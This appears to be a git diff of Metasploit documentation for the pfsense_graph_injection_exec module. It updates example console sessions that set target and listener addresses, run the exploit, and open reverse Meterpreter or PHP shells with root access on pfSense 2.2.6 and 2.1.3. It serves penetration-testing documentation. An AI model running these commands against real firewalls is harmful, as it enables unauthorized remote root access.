27
27
### pfSense Community Edition 2.2.6-RELEASE
28
28
29
29
```
30
- msf exploit(unix/http/pfsense_graph_injection_exec) > options
30
+ msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
31
+ RHOST => 2.2.2.2
32
+ msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
33
+ LHOST => 1.1.1.1
34
+ msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
31
35
32
- Module options (exploit/unix/http/pfsense_graph_injection_exec):
33
-
34
- Name Current Setting Required Description
35
- ---- --------------- -------- -----------
36
- PASSWORD pfsense yes Password to login with
37
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
38
- RHOST 192.168.75.132 yes The target address
39
- RPORT 443 yes The target port (TCP)
40
- SSL true no Negotiate SSL/TLS for outgoing connections
41
- USERNAME admin yes User to login with
42
- VHOST no HTTP server virtual host
43
-
44
-
45
- Payload options (php/meterpreter/reverse_tcp):
46
-
47
- Name Current Setting Required Description
48
- ---- --------------- -------- -----------
49
- LHOST 192.168.75.128 yes The listen address
50
- LPORT 80 yes The listen port
51
-
52
-
53
- Exploit target:
54
-
55
- Id Name
56
- -- ----
57
- 0 Automatic Target
58
-
59
-
60
- msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
61
-
62
- [*] Started reverse TCP handler on 192.168.75.128:80
36
+ [*] Started reverse TCP handler on 1.1.1.1:4444
63
37
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
64
- [*] Triggering the payload, root shell incoming...
65
- [*] Sending stage (37543 bytes) to 192.168.75.132
66
- [*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600
67
-
38
+ [*] Payload uploaded successfully, executing
39
+ [*] Sending stage (37543 bytes) to 2.2.2.2
40
+ [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
41
+
42
+ meterpreter > sysinfo
43
+ Computer : pfSense.localdomain
44
+ OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
45
+ Meterpreter : php/freebsd
68
46
meterpreter > getuid
69
47
Server username: root (0)
70
48
meterpreter >
@@ -73,45 +51,20 @@ meterpreter >
73
51
### pfSense Community Edition 2.1.3-RELEASE
74
52
75
53
```
76
- msf exploit(unix/http/pfsense_graph_injection_exec) > options
77
-
78
- Module options (exploit/unix/http/pfsense_graph_injection_exec):
79
-
80
- Name Current Setting Required Description
81
- ---- --------------- -------- -----------
82
- PASSWORD pfsense yes Password to login with
83
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
84
- RHOST 192.168.75.131 yes The target address
85
- RPORT 443 yes The target port (TCP)
86
- SSL true no Negotiate SSL/TLS for outgoing connections
87
- USERNAME admin yes User to login with
88
- VHOST no HTTP server virtual host
89
-
90
-
91
- Payload options (php/meterpreter/reverse_tcp):
92
-
93
- Name Current Setting Required Description
94
- ---- --------------- -------- -----------
95
- LHOST 192.168.75.128 yes The listen address
96
- LPORT 80 yes The listen port
97
-
98
-
99
- Exploit target:
100
-
101
- Id Name
102
- -- ----
103
- 0 Automatic Target
104
-
105
-
54
+ msf > use exploit/unix/http/pfsense_graph_injection_exec
55
+ msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
56
+ RHOST => 2.2.2.2
57
+ msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
58
+ LHOST => 1.1.1.1
59
+ msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
60
+ PAYLOAD => php/reverse_php
106
61
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
107
62
108
- [*] Started reverse TCP handler on 192.168.75.128:80
63
+ [*] Started reverse TCP handler on 1.1.1.1:4444
109
64
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
110
- [*] Triggering the payload, root shell incoming...
111
- [*] Sending stage (37543 bytes) to 192.168.75.131
112
- [*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600
65
+ [*] Payload uploaded successfully, executing
66
+ [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
67
+ uname -a
113
68
114
- meterpreter > getuid
115
- Server username: root (0)
116
- meterpreter >
69
+ FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
117
70
```
0 commit comments